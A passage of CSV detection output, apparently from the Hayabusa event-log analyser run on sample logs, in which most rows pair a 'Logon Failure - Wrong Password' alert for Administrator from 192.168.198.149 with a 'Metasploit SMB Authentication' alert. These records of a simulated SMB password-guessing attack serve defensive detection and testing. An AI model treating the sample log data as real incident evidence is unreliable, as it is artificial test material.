01:50:09.420 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.455 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IJmZFXFxiLuWWkMC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.455 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.500 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x9EPwprgXSJNUFfg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.500 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h0ZjYxZ8K5m5F1vo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.544 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.587 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xSw7OjDv8ldqbm5T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.587 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.631 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mk0BAdOI210HwPhX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.631 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.686 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wSwWz57Kvl2XJVUR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.686 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DLcfSrHT5bSsNnuQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.720 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rQDkbESps0PXWEUT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.760 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.797 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZpnyzkXasuyAtdn1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.797 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.840 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ps9IqJzTliJvzpIS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.840 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.876 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V7PLb2uRTIY8t123 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.876 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.921 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sHAJ9p0QbSRxhvtk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.921 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.968 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YRiE1wGrwWAx0feP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.968 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Flo4bCVjmlaHz0QS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.016 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.061 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HscUujSzd3Ua7dqg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.061 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aIQPTx67aEer51wb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.156 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.191 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MqUoXUf7PKIaoDjs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.191 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.222 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wzeB4DAS1W633tmh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.222 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.263 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UTtXTrqHoCZMbDLT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.263 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.311 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4HVv5PgPhiDW3qcj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.311 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: g21VoO45UrIbTuZO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.344 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.383 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rGpD7AJUTekDmd6Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.383 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.423 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OykzTOn7B9THv0cT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.423 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.462 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cIYOrBBwX8nFpCzw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.462 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.508 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SvnROHLMVnmPfAyy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.508 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5EwJ84H7kXQXzGZz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.547 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 34RLeLWDgLayU3JM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.580 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.619 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QaXHGUgboODAi5Qu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.619 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.659 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QlOlZ0m397CsmaeD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.659 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.699 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: N24rSPCI8DsQIPXR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.699 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.738 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5y2tgoUcs6mFPZm4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.738 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HmFX6MioYqaMumgw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.776 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.820 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: R4HRWlPWPKy1Cicq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.820 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.869 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GDUf7wVbHkS9uaPC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.869 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.917 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eBX0Lviz6Bv5rGcb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.917 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zZwPm9qahLU78FRY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:10.956 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jOVsopykTHNQcYUp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.008 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n8DY7sdDY8nuWdME : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.060 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.105 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rTxEVu7mudXEBARZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.105 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7ohqvCoOLkFRcqvE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.148 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: me8rikVJqcKxvHdq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.180 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oLqVmqCmHTrD7V8V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.228 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.269 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5ySdyzxvDasHgjq0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.269 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.312 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: N2auwOc1wemq76n1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.312 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RgK6lHgC5WOBk4kW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.348 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.389 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2GG0bKgusKqseQij : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.389 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MpHm7DcOmhq4rkaX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.432 